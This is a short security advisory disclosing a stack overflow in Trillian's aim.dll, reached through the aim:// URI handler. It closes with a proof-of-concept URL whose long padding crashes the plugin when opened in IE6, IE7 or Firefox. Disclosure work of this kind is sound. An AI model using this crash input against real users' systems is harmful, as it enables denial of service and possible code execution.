Stack Overflow in Trillian’s aim.dll through the aim:// URI
The Trillian application is a tool that allows users to chat across multipleprotocols, such as AIM, IRC, ICQ, Yahoo!, and MSN.
When Trillian is installed, the
aim:// URI will be registered in the Windows Registry and associated with the command
‘Rundll32.exe “C:/Program Files/Trillian/plugins/aim.dll”, aim_util_urlHandler url=”%1”ini="c:/program files/trillian/users/default/cache/pending_aim.ini”’.
As you can see,calling the aim:// protocol will spawn a Rundll32.exe process which will load aim.dll withthe specified options. The value that is put into aim_util_urlHandler url is controlled bythe user through the URI, such as aim://MyURL. This value is later copied withoutbounds checking and an attacker can use this to cause a stack overflow exception.Accessing the following URL from IE6, IE7, or Firefox will trigger a stackoverflow:
aim:///#1111111/1111111111111111111111111111111111111111111111111111111111111
2222222222222222222222222222222222222222222222222222222222222
3333333333333333333333333333333333333333333333333333333333333
4444444444444444444444444444444444444444444444444444444444444
5555555555555555555555555555555555555555555555555555555555555
6666666AAAABBBB6666666666666666666666666666666666666666666666
6666666666666667777777777777777777777777777777777777777777777777777777777777
8888888888888888888888888888888888888888888888888888888888888
9999999999999999999999999999999999999999999999999999999999999
0000000000000000000000000000000000000000000000000000000000000